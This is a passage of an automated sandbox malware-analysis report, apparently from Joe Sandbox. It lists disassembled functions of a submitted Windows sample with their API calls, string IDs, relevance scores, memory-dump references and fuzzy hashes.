      • Part of subcall function 0005C083: GetNumberFormatW.KERNEL32(00000400,00000000,?,0008072C,?,?), ref: 0005C0F8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberParentSpecificWindow__vswprintf_c_l
    • String ID: %s %s$REPLACEFILEDLG
    • API String ID: 2415798972-439456425
    • Opcode ID: c4b9fdcc031844f4db50f86493b86a308f11dd1be0f1e48407159bbb4cadc571
    • Instruction ID: e8b3d9efa5fb27996e571d60049e8e3c0f11d9556f7b081c3bcba20805ce50fe
    • Opcode Fuzzy Hash: c4b9fdcc031844f4db50f86493b86a308f11dd1be0f1e48407159bbb4cadc571
    • Instruction Fuzzy Hash: F071BA72548704BBE7319B64DC49FFF77ECEB8A702F04041AFA49D2091D675A9098B63
    Function 00047AAF Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 337fileCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00047AB4
    • _wcslen.LIBCMT ref: 00047B1D
    • _wcslen.LIBCMT ref: 00047B8E
      • Part of subcall function 00048704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00048713
      • Part of subcall function 00048704: GetLastError.KERNEL32 ref: 00048759
      • Part of subcall function 00048704: CloseHandle.KERNEL32(?), ref: 00048768
      • Part of subcall function 0004B470: DeleteFileW.KERNEL32(?,00000000,?,0004A438,?,?,?,?,0004892B,?,?,?,000737FF,000000FF), ref: 0004B481
      • Part of subcall function 0004B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,0004A438,?,?,?,?,0004892B,?,?,?,000737FF,000000FF), ref: 0004B4AF
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00047C43
    • CloseHandle.KERNEL32(00000000), ref: 00047C5F
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00047DAB
      • Part of subcall function 0004B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00047ED0,?,?,?,00000000), ref: 0004B04C
      • Part of subcall function 0004B032: SetFileTime.KERNEL32(?,?,?,?), ref: 0004B100
      • Part of subcall function 0004A880: CloseHandle.KERNEL32(000000FF,?,?,0004A83D,?,?,?,?,?,000737FF,000000FF), ref: 0004A89B
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B8FA
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B92B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
    • API String ID: 3983180755-3508440684
    • Opcode ID: 4fb9e66ad0c939f0afd1a0182ccacd9d18190a5b49e7577f82953fa217cdec1d
    • Instruction ID: 8900215949d9cd98a5cc24ef2a4725ee7c5eaa80723358b530202bd3fbd8985f
    • Opcode Fuzzy Hash: 4fb9e66ad0c939f0afd1a0182ccacd9d18190a5b49e7577f82953fa217cdec1d
    • Instruction Fuzzy Hash: F2C1A5B1904249AAEB21DB64CC85FEEB7ACBF04314F00457AF54DE7182DB74EA44CBA5
    Function 0006EA9E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: __floor_pentium4
    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
    • API String ID: 4168288129-2761157908
    • Opcode ID: 58bbd1586095efa5ceea3644fc11b205457a863ecb9cf7a540bb1d77316053bc
    • Instruction ID: 6c46c1fa027c75d4f25d50ea37183898364a9f2737f441317b7718a005cab3bd
    • Opcode Fuzzy Hash: 58bbd1586095efa5ceea3644fc11b205457a863ecb9cf7a540bb1d77316053bc
    • Instruction Fuzzy Hash: 2BC22871E086298FDB65CE28ED407EAB7F6EB44314F1441EAD84DE7241E779AE818F40
    Function 0004395A Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 666COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog_swprintf
    • String ID: CMT$h%u$hc%u
    • API String ID: 146138363-3282847064
    • Opcode ID: 813b2c5a7d17cbdf01e274992d7d79f53968e76166f710b2f0ec1530150f48de
    • Instruction ID: 177e568a52ca73d4daf3d97b910110e9367d469f6e31538f917775435642bc47
    • Opcode Fuzzy Hash: 813b2c5a7d17cbdf01e274992d7d79f53968e76166f710b2f0ec1530150f48de
    • Instruction Fuzzy Hash: 0542E3B16002849BDF24DF34C885BEA3BE5AF15300F444479FD4A9B283DB74AA89CB65
    Function 00042EB6 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 804COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00042EBF
    • _strlen.LIBCMT ref: 0004348B
      • Part of subcall function 000515F9: __EH_prolog.LIBCMT ref: 000515FE
      • Part of subcall function 00052EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004CF18,00000000,?,?), ref: 00052EDE
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000435DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
    • String ID: CMT
    • API String ID: 1206968400-2756464174
    • Opcode ID: 4935dc2e967ed677b246140ac868ce95462817c6a9adefbf7a9a0561c759c99a
    • Instruction ID: 9315703b8f8b968b76129a75af65d192c550ec6ccb2b49669bacdc7d9aef7f25
    • Opcode Fuzzy Hash: 4935dc2e967ed677b246140ac868ce95462817c6a9adefbf7a9a0561c759c99a
    • Instruction Fuzzy Hash: C56228B16002848FDF29DF38C8956E97BE1AF55304F08457EFC5A8B283DB74AA49CB54
    Function 000609FA Relevance: 6.1, APIs: 4, Instructions: 73COMMON
    Download Yara Rule
    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00060A06
    • IsDebuggerPresent.KERNEL32 ref: 00060AD2
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00060AF2
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00060AFC
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
    • String ID:
    • API String ID: 254469556-0
    • Opcode ID: 22df2a543b160edae3aa8e80462fcd97616ffccdff6faa4981c5710a9f3d9ab9
    • Instruction ID: 325ccc88757a9feb2900e6b30a15c6b2b78dbacb7009037be7be7ff17b21fd24
    • Opcode Fuzzy Hash: 22df2a543b160edae3aa8e80462fcd97616ffccdff6faa4981c5710a9f3d9ab9
    • Instruction Fuzzy Hash: 45313875D4121C9BEB20EFA4DD89BCDBBB8AF08304F1041EAE40CAB251EB755A848F04
    Function 0005F81F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • VirtualQuery.KERNEL32(80000000,0005F764,0000001C,0005F959,00000000,?,?,?,?,?,?,?,0005F764,00000004,000A3D24,0005F9E9), ref: 0005F830
    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0005F764,00000004,000A3D24,0005F9E9), ref: 0005F84B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: InfoQuerySystemVirtual
    • String ID: D
    • API String ID: 401686933-2746444292
    • Opcode ID: 59c63c16f08c2e9e4020875954ad36647ccd1ee777671ebd8a486c0857da831c
    • Instruction ID: 892294a54bf2f462f8dd2364cd6ba8aeb97d10d621922a677e113ff80374bbd8
    • Opcode Fuzzy Hash: 59c63c16f08c2e9e4020875954ad36647ccd1ee777671ebd8a486c0857da831c
    • Instruction Fuzzy Hash: C101B172A001096BDB14EE29DC05ABE7BE9EFD4325F08C234AD19D7254EA38D946C680
    Function 00064FDF Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 000650D7
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 000650E1
    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 000650EE
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: 0b270cee6ba12bc71f7c2b3635ddba8af0fdbbd7a01b93009ae1fc62b39a3ee0
    • Instruction ID: df8368174da677ddd1d838daa2aea50d149590597c2bc402dc6f283393955ac3
    • Opcode Fuzzy Hash: 0b270cee6ba12bc71f7c2b3635ddba8af0fdbbd7a01b93009ae1fc62b39a3ee0
    • Instruction Fuzzy Hash: 5F31A3749412189BDB61DF64DC897DDBBB4AF18310F5041DAE80CA7251EB749B858F44
    Function 0006C4F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID: .
    • API String ID: 0-248832578
    • Opcode ID: 7cd4e41063da529f520b3ee435ca300a88f80e0bebfa27596f9c404686953106
    • Instruction ID: 05ec1d3a0c97294b252375d8dee2962598f918f1fd576d367f64e8df03057bb9
    • Opcode Fuzzy Hash: 7cd4e41063da529f520b3ee435ca300a88f80e0bebfa27596f9c404686953106
    • Instruction Fuzzy Hash: 3C31F8719002496FEB649E78CC84EFB7BFEDF85314F140198F55AD7252E630AE858B50
    Function 0006E5F0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
    • Instruction ID: 93073dcee0de2d8c8bce0e0f76d1fbdd284f0eabaa1468bafdda8311d87460a9
    • Opcode Fuzzy Hash: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
    • Instruction Fuzzy Hash: 48022C75E002199FDF54CFA9C8806AEBBF6FF48314F258169D819EB385D731AE418B90
    Function 0005C083 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
    Download Yara Rule
    APIs
    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0005C0A9
    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0008072C,?,?), ref: 0005C0F8
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FormatInfoLocaleNumber
    • String ID:
    • API String ID: 2169056816-0
    • Opcode ID: 88e08a35c4a07f3c6a24ac36b043ab9a7a4e1b97f1e8a94362d1e1adc4c4f4ae
    • Instruction ID: af8001a78ec187a7aa89018519ee5656d9115e99227c3b1fe0e3ffe685f68c2f
    • Opcode Fuzzy Hash: 88e08a35c4a07f3c6a24ac36b043ab9a7a4e1b97f1e8a94362d1e1adc4c4f4ae
    • Instruction Fuzzy Hash: 18011A36540318AAE7109BA4EC45FDB77BCFF19720F405422FA05A7191E378A958CBA5
    Function 00047727 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(00047886,?,00000400), ref: 00047727
    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00047748
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorFormatLastMessage
    • String ID:
    • API String ID: 3479602957-0
    • Opcode ID: 274adc89450374daaefc6d294f6462b9d5eccc1d90be6a9901c809027ae0a6ef
    • Instruction ID: afb1f8c6121520eb503090117684823cd67098b2c79df9799d798f4a06d31aba
    • Opcode Fuzzy Hash: 274adc89450374daaefc6d294f6462b9d5eccc1d90be6a9901c809027ae0a6ef
    • Instruction Fuzzy Hash: E9D05271248300BAFA100B205C0AF2A2799BB00B41F108024B308A80E0D7789060A628
    Function 00072BA4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00072B9F,?,?,00000008,?,?,0007283F,00000000), ref: 00072DD1
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ExceptionRaise
    • String ID:
    • API String ID: 3997070919-0
    • Opcode ID: f3c0adc2b40870c7dbe166c6b438be3161a1e2d8bcf356e08fb0c2c3bd154708
    • Instruction ID: e9cc5803bd289b2aa1fba24b36a92339e0df1f0bd285eff9e1745e2cc1357543
    • Opcode Fuzzy Hash: f3c0adc2b40870c7dbe166c6b438be3161a1e2d8bcf356e08fb0c2c3bd154708
    • Instruction Fuzzy Hash: 33B13B31A10608DFD765CF28C48AB697BE0FF45364F25C658E99ACF2A1C339E991CB44
    Function 00060816 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
    Download Yara Rule
    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0006082C
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    • Opcode ID: ef8b39621595eb9868c601063483d9d873f38565175729b9ee5f4be361b99b30
    • Instruction ID: 2229941935d2f9cc913ebf68828f7e0c564a195d8636fd3ef5a369a36a2bbf99
    • Opcode Fuzzy Hash: ef8b39621595eb9868c601063483d9d873f38565175729b9ee5f4be361b99b30
    • Instruction Fuzzy Hash: 4F5169B1E54615CFEB54CF64E8857AEBBF2FB48310F24842AD445EB2A1D7789940CFA0
    Function 0004C365 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
    Download Yara Rule
    APIs
    • GetVersionExW.KERNEL32(?), ref: 0004C388
      • Part of subcall function 0004C3F7: __EH_prolog.LIBCMT ref: 0004C3FC
      • Part of subcall function 0004C3F7: CoCreateInstance.COMBASE(000768A0,00000000,00000001,000767D0,?), ref: 0004C41E
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CreateH_prologInstanceVersion
    • String ID:
    • API String ID: 511865808-0
    • Opcode ID: b3d5f4dc4bb786d52cfdb508c1646f9a5cf15e220f225464715869e5f4956e0e
    • Instruction ID: c5e00bf22c4058ca18543e6bf6994c6598bfe5693e0a22302440d2b51f43c9f5
    • Opcode Fuzzy Hash: b3d5f4dc4bb786d52cfdb508c1646f9a5cf15e220f225464715869e5f4956e0e
    • Instruction Fuzzy Hash: 7CF0AEB090628C8BFFA5DF60A8197D837E4571170AF0481E5C1C052153D3B95BC5DF7A
    Function 00044A8E Relevance: 1.5, Strings: 1, Instructions: 276COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
